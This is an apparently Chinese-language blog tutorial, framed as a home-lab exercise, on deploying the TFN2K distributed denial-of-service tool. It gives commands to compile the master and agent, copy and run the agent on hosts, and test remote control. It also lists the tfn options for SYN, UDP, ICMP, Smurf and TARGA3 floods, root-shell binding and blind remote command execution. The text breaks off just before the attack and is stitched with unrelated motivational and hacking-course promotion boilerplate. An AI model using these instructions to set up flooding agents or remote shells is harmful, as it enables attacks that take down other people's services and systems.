写在最后
在结束之际,我想重申的是,学习并非如攀登险峻高峰,而是如滴水穿石般的持久累积。尤其当我们步入工作岗位之后,持之以恒的学习变得愈发不易,如同在茫茫大海中独自划舟,稍有松懈便可能被巨浪吞噬。然而,对于我们程序员而言,学习是生存之本,是我们在激烈市场竞争中立于不败之地的关键。一旦停止学习,我们便如同逆水行舟,不进则退,终将被时代的洪流所淘汰。因此,不断汲取新知识,不仅是对自己的提升,更是对自己的一份珍贵投资。让我们不断磨砺自己,与时代共同进步,书写属于我们的辉煌篇章。
需要完整版PDF学习资源私我
网上学习资料一大堆,但如果学到的知识不成体系,遇到问题时只是浅尝辄止,不再深入研究,那么很难做到真正的技术提升。
一个人可以走的很快,但一群人才能走的更远!不论你是正从事IT行业的老鸟或是对IT行业感兴趣的新人,都欢迎加入我们的的圈子(技术交流、学习资源、职场吐槽、大厂内推、面试辅导),让我们一起学习成长!
什么是DDos
DDoS
攻击(Distributed Denial of Service Attack
),即分布式拒绝服务攻击。最简单的定义就是:多台电脑对一台电脑的攻击,占用目标服务器或网络资源的攻击行为
什么是TFN 2K
TFN 2K
通过主控端利用大量代理端主机的资源进行对一个或多个目标进行协同攻击,是DDos
的实现工具
攻击体系
主控端—运行TFN
客户端,来遥控并指定攻击目标,更改攻击方法
代理端—被植入并运行TD
进程的牺牲品,接受TFN
的指挥,攻击的实施者
TFN 2K特性
- 主控端通过随机
TCP
、UDP
、ICMP
之一的数据包向代理端主机发送命令,攻击方法包括TCP/SYN
、UDP
、ICMP/PING
、混合攻击、TARGA3
等。 - 主控端与代理端的通讯采取单向,即主控端只向代理端发送命令,并且会采取随机的头信息,甚至虚拟的源地址信息,代理端不会逆向向主控端发送任何信息。
二. 安装配置
我在个人本地服务器上部署了几台设备,来模拟应用场景。网络拓扑如下,需实现Master
控制两台Attacker
攻击两台Defender
2.1 安装TFN
在主控端Master
下载TFN 2K
软件(因软件的特殊性,本人概不提供相关的下载渠道),设下载并解压的文件夹名称为TFN2K
。
切换至下载目录,对软件进行编译,同时设置一个八位数的登录密码
cd TFN2K/src
make
编译后即可生成tfn
和td
登录所有代理端,将主机端的td
下载到代理端本地
scp root@192.166.60.1:/root/TFN2K/src/td ./
scp root@192.166.61.1:/root/TFN2K/src/td ./
为td
赋权,并执行文件,此时,代理端部署完毕
chmod 777 td
./td
可利用ps -a
查看进程,发现td
已经在运行了
2.2 TFN命令讲解
可在主控端输入./tfn
查看相关参数
-P protocol
:设置服务器通信的协议。可以是ICMP
、UDP
或TCP
。使用随机协议作为默认值-D n
:为每个真实的请求发送n
个虚假请求以诱骗目标-S hostIp
:可指定源ip
。默认情况下随机欺骗-f hostlist
:存储TFN
的所有主控端的文件名,表示其中所有主控端均实现攻击操作-h hostname
:只利用该主控端发起攻击,也就是一对一的攻击,后面跟一个主机或IP地址-p port
:为SYN
洪泛指定TCP
目标端口-c ID
:攻击参数-c 0
:停止攻击-c 1
:设置反欺骗等级设定,用法:-i 0
(完全欺骗)到-i 3
(/24个主机字节欺骗)-c 2
:改变攻击数据包大小,用法:-i <packet size in bytes>
-c 3
:将根shell
绑定到一个指定的端口,用法:-i<remote port>
-c 4
:UDP
洪水,用法:-i victim@victim2@victim3@...
-c 5
:TCP/SYN
洪水,用法:-i victim@...[-p目标端口]
-c 6
:ICMP/PING
洪水,用法:-i victim@...
-c 7
:ICMP/SMURF
洪水,用法:-i victim@broadcast@broadcast2@...
-c 8
:MIX flood
(随机UDP/TCP/ICMP
攻击),用法:-i victim@...
-c 9
:TARGA3
洪水(IP
堆栈渗透),用法:-i victim@...
-c 10
:盲目执行远程shell
命令,使用-i
命令,一般还可用于远程命令控制
2.3 测试TD
在实现泛洪攻击前,先对所有的代理端进行测试,测试其是否可“听从”主控端的安排
创建host.txt
文件用于记录所有运行了./td
文件的代理端
echo "192.166.60.2" > host.txt
echo "192.166.61.2" > host.txt
操作tfn
向所有的代理端实现创建文件夹的命令,一般创建的文件夹都和td
在同一级目录
./tfn -f /root/TFN2K/host.txt -c 10 -i "mkdir TestMakeDir"
查看代理端可知,文件夹创建成功,表明主控端可操作所有的代理端
三. 攻击
3.1 准备工作
先为被攻击服务器安装流量抓包软件,在DF1
上安装tcpdump
apt install tcpdump
给大家的福利
零基础入门
对于从来没有接触过网络安全的同学,我们帮你准备了详细的学习成长路线图。可以说是最科学最系统的学习路线,大家跟着这个大的方向学习准没问题。
同时每个成长路线对应的板块都有配套的视频提供:
因篇幅有限,仅展示部分资料
网络安全面试题
绿盟护网行动
还有大家最喜欢的黑客技术
网络安全源码合集+工具包
所有资料共282G,朋友们如果有需要全套《网络安全入门+黑客进阶学习资源包》,可以扫描下方二维码领取(如遇扫码问题,可以在评论区留言领取哦)~
网上学习资料一大堆,但如果学到的知识不成体系,遇到问题时只是浅尝辄止,不再深入研究,那么很难做到真正的技术提升。
一个人可以走的很快,但一群人才能走的更远!不论你是正从事IT行业的老鸟或是对IT行业感兴趣的新人,都欢迎加入我们的的圈子(技术交流、学习资源、职场吐槽、大厂内推、面试辅导),让我们一起学习成长!